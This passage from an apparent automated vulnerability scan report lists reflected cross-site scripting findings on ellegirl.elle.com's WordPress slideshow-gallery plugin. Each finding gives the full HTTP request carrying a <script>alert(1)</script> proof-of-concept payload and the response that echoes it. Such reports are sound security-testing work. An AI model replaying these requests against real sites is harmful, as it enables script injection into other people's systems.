Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:46 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30632
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:48 GMT
Date: Sat, 17 Sep 2011 16:36:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/slideshow-gallery-214a53</script><script>alert(1)</script>0b0634e9d94/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0';
//s.evar3 = '';
s.evar3 = document.
...[SNIP]...
4.142. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc1b8</script><script>alert(1)</script>1f05cfa002a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/slideshow-gallery-2/cssdc1b8</script><script>alert(1)</script>1f05cfa002a/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:38:21 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30632
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:38:25 GMT
Date: Sat, 17 Sep 2011 16:38:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/slideshow-gallery-2/cssdc1b8</script><script>alert(1)</script>1f05cfa002a/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0';
//s.evar3 = '';
s.evar3 = document.titl
...[SNIP]...
4.143. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92d68</script><script>alert(1)</script>d45f77eff4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php92d68</script><script>alert(1)</script>d45f77eff4?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:32 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30631
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:34 GMT
Date: Sat, 17 Sep 2011 16:39:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
le;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php92d68</script><script>alert(1)</script>d45f77eff4?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = ''
...[SNIP]...
4.144. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [background parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of the background request parameter is copied into the HTML document as plain text between tags. The payload 96953<script>alert(1)</script>c042feba2cc was submitted in the background parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%2300000096953<script>alert(1)</script>c042feba2cc&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 2468
Content-Type: text/css
Date: Sat, 17 Sep 2011 16:32:28 GMT
Connection: close


                                   #slideshow { list-style:none; color:#fff; }

#slideshow span { display:none; }

#slideshow-wrapper { width:294px; background:#00000096953<script>alert(1)</script>c042feba2cc; padding:2px; border:4px solid #000000; margin:25px auto; display:none; }

#slideshow-wrapper * { margin:0; padding:0; }

#fullsize { position:relative; z-index:1; overflow:hidden; width:294px; he
...[SNIP]...
4.145. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [border parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of the border request parameter is copied into the HTML document as plain text between tags. The payload 54d3b<script>alert(1)</script>15eb3ef26b6 was submitted in the border parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%2300000054d3b<script>alert(1)</script>15eb3ef26b6&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 2345
Content-Type: text/css
Date: Sat, 17 Sep 2011 16:32:27 GMT
Connection: close


                                   #slideshow { list-style:none; color:#fff; }

#slideshow span { display:none; }

#slideshow-wrapper { width:294px; background:#000000; padding:2px; border:4px solid #00000054d3b<script>alert(1)</script>15eb3ef26b6; margin:25px auto; display:none; }

#slideshow-wrapper * { margin:0; padding:0; }

#fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375px; }

#information { positio
...[SNIP]...
4.146. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of the height request parameter is copied into the HTML document as plain text between tags. The payload cd1a4<script>alert(1)</script>a24713541b6 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375cd1a4<script>alert(1)</script>a24713541b6&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 2345
Content-Type: text/css
Date: Sat, 17 Sep 2011 16:32:25 GMT
Connection: close


                                   #slideshow { list-style:none; color:#fff; }

#slideshow span { display:none; }

#slideshow-wrapper { width:294px; background:#000000; pad
...[SNIP]...
g:2px; border:4px solid #000000; margin:25px auto; display:none; }

#slideshow-wrapper * { margin:0; padding:0; }

#fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375cd1a4<script>alert(1)</script>a24713541b6px; }

#information { position:absolute; bottom:0; width:294px; height:0; background:#000000; color:#FFFFFF; overflow:hidden; z-index:200; opacity:.7; filter:alpha(opacity=70); }

#information h3 {
...[SNIP]...
4.147. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [infobackground parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of the infobackground request parameter is copied into the HTML document as plain text between tags. The payload b9914<script>alert(1)</script>0ce3ef5c381 was submitted in the infobackground parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000b9914<script>alert(1)</script>0ce3ef5c381&infocolor=%23FFFFFF&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 2345
Content-Type: text/css
Date: Sat, 17 Sep 2011 16:32:30 GMT
Connection: close


                                   #slideshow { list-style:none; color:#fff; }

#slideshow span { display:none; }

#slideshow-wrapper { width:294px; background:#000000; pad
...[SNIP]...
argin:0; padding:0; }

#fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375px; }

#information { position:absolute; bottom:0; width:294px; height:0; background:#000000b9914<script>alert(1)</script>0ce3ef5c381; color:#FFFFFF; overflow:hidden; z-index:200; opacity:.7; filter:alpha(opacity=70); }

#information h3 { color:#FFFFFF; padding:4px 8px 3px; font-size:14px; }

#information p { color:#FFFFFF; padd
...[SNIP]...
4.148. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [infocolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php

Issue detail

The value of the infocolor request parameter is copied into the HTML document as plain text between tags. The payload 5d2d4<script>alert(1)</script>5f12622561e was submitted in the infocolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/slideshow-gallery-2/css/gallery-css.php?1=1&resizeimages=Y&width=300&height=375&border=4px+solid+%23000000&background=%23000000&infobackground=%23000000&infocolor=%23FFFFFF5d2d4<script>alert(1)</script>5f12622561e&ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 2427
Content-Type: text/css
Date: Sat, 17 Sep 2011 16:32:31 GMT
Connection: close


                                   #slideshow { list-style:none; color:#fff; }

#slideshow span { display:none; }

#slideshow-wrapper { width:294px; background:#000000; pad
...[SNIP]...
g:0; }

#fullsize { position:relative; z-index:1; overflow:hidden; width:294px; height:375px; }

#information { position:absolute; bottom:0; width:294px; height:0; background:#000000; color:#FFFFFF5d2d4<script>alert(1)</script>5f12622561e; overflow:hidden; z-index:200; opacity:.7; filter:alpha(opacity=70); }

#information h3 { color:#FFFFFF5d2d4<script>
...[SNIP]...
4.149. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/js/gallery.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a4a3</script><script>alert(1)</script>1c29d3413e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content2a4a3</script><script>alert(1)</script>1c29d3413e5/plugins/slideshow-gallery-2/js/gallery.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:03 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30493
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:08 GMT
Date: Sat, 17 Sep 2011 16:33:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content2a4a3</script><script>alert(1)</script>1c29d3413e5/plugins/slideshow-gallery-2/js/gallery.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.h
...[SNIP]...
4.150. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/js/gallery.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 110e9</script><script>alert(1)</script>bac76ecf71f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins110e9</script><script>alert(1)</script>bac76ecf71f/slideshow-gallery-2/js/gallery.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:34:41 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30493
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:34:46 GMT
Date: Sat, 17 Sep 2011 16:34:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...

//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins110e9</script><script>alert(1)</script>bac76ecf71f/slideshow-gallery-2/js/gallery.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;


...[SNIP]...
4.151. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/js/gallery.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b075</script><script>alert(1)</script>53ad48668b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/slideshow-gallery-26b075</script><script>alert(1)</script>53ad48668b0/js/gallery.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:36:18 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30493
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:36:22 GMT
Date: Sat, 17 Sep 2011 16:36:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/slideshow-gallery-26b075</script><script>alert(1)</script>53ad48668b0/js/gallery.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NO
...[SNIP]...
4.152. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/js/gallery.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5db2</script><script>alert(1)</script>e0de1be640b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/slideshow-gallery-2/jsd5db2</script><script>alert(1)</script>e0de1be640b/gallery.js?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:37:45 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30493
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:37:49 GMT
Date: Sat, 17 Sep 2011 16:37:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
p3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/slideshow-gallery-2/jsd5db2</script><script>alert(1)</script>e0de1be640b/gallery.js?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT A
...[SNIP]...
4.153. http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/slideshow-gallery-2/js/gallery.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26a84</script><script>alert(1)</script>98621cdf3b5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins/slideshow-gallery-2/js/gallery.js26a84</script><script>alert(1)</script>98621cdf3b5?ver=1.0 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:39:08 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30493
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:39:11 GMT
Date: Sat, 17 Sep 2011 16:39:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
nt.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content/plugins/slideshow-gallery-2/js/gallery.js26a84</script><script>alert(1)</script>98621cdf3b5?ver=1.0';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
s.evar7 = 'eg:misc';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTHI
...[SNIP]...
4.154. http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

